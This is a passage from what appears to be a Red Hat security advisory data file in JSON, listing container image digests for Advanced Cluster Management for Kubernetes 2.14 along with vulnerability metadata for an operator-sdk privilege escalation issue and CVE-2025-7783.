"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "operator-sdk: privilege escalation due to incorrect permissions of /etc/passwd"
},
{
"cve": "CVE-2025-7783",
"cwe": {
"id": "CWE-330",
"name": "Use of Insufficiently Random Values"
},
"discovery_date": "2025-07-18T17:00:43.396637+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
